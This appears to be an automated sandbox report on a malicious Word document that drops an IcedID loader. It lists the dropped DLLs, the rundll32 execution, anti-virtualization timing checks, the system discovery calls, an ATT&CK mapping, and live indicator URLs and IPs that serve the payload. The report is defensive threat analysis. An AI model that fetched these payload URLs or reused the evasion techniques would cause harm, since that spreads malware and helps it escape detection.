    Source: Binary string: rundll32.pdb source: r9093.tmp.exe, r9093.tmp.exe, 00000004.00000000.924895395.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe, 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe.1.dr
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007619CA push ecx; ret 4_2_007619DD
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7538BC2 push rax; ret 5_2_000007FEF7538BDE
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF753610E push rdx; ret 5_2_000007FEF753611B
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
    Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drStatic PE information: real checksum: 0x59d91 should be: 0x62962
    Source: y875E.tmp.dll.1.drStatic PE information: real checksum: 0x59d91 should be: 0x62962
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread,5_2_0000000180002AC0
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
    Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000133C
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000180001C28
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00761189

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_00761593
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,5_2_0000000180002018

    Stealing of Sensitive Information

    barindex
    Yara detected IcedID
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

    Remote Access Functionality

    barindex
    Yara detected IcedID
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Command and Scripting Interpreter    		Path Interception111
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium2
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts12
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools    		LSASS Memory22
    Security Software Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth14
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts1
    Native API    		Logon Script (Windows)Logon Script (Windows)111
    Process Injection    		Security Account Manager1
    Account Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local Accounts33
    Exploitation for Client Execution    		Logon Script (Mac)Logon Script (Mac)12
    Scripting    		NTDS1
    System Owner/User Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer123
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets1
    Remote System Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Rundll32    		Cached Domain Credentials1
    System Network Configuration Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    File and Directory Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
    System Information Discovery    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    courtesyautomotivedoc08.11.doc27%VirustotalBrowse
    courtesyautomotivedoc08.11.doc18%ReversingLabsScript-Macro.Trojan.Amphitryon
    courtesyautomotivedoc08.11.doc100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll100%AviraHEUR/AGEN.1251556
    C:\Users\user\AppData\Local\Temp\y875E.tmp.dll100%AviraHEUR/AGEN.1251556
    C:\Users\user\AppData\Local\Temp\~DF612CB1A14F491B4E.TMP100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\r9093.tmp.exe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\r9093.tmp.exe0%ReversingLabs

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    5.2.rundll32.exe.7fef7530000.2.unpack100%AviraHEUR/AGEN.1251556Download File
    5.2.rundll32.exe.180000000.1.unpack100%AviraHEUR/AGEN.1205098Download File

    Domains

    SourceDetectionScannerLabelLink
    alexbionka.com2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    alexbionka.com2%VirustotalBrowse
    alexbionka.com0%Avira URL Cloudsafe
    http://alexbionka.com/2%VirustotalBrowse
    http://alexbionka.com/0%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c0%Avira URL Cloudsafe
    http://45.8.1460%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll0%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Zf0%Avira URL Cloudsafe
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    alexbionka.com
    		64.227.108.27
    		truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    alexbionka.comtrue
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://alexbionka.com/true
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dllfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_cr9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://45.8.146rundll32.exe, 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		low
    http://45.8.146.139/fhfty/A2-7QTSJAH4Zfr9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_nrundll32.exe, 00000005.00000002.944141742.0000000000594000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    45.8.146.139
    		unknownRussian Federation
    		44676VMAGE-ASRUfalse
    64.227.108.27
    		alexbionka.comUnited States
    		14061DIGITALOCEAN-ASNUStrue

    General Information

    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:682567
    Start date and time:2022-08-11 17:37:25 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 58s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:courtesyautomotivedoc08.11.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.expl.evad.winDOC@5/14@2/2
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 80% (good quality ratio 61.6%)
    • Quality average: 58.3%
    • Quality standard deviation: 38.9%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 28
    • Number of non-executed functions: 23
    Cookbook Comments:
    • Found application associated with file extension: .doc
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe
    • Report size getting too big, too many NtQueryAttributesFile calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    17:38:35API Interceptor1x Sleep call for process: rundll32.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    45.8.146.139drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
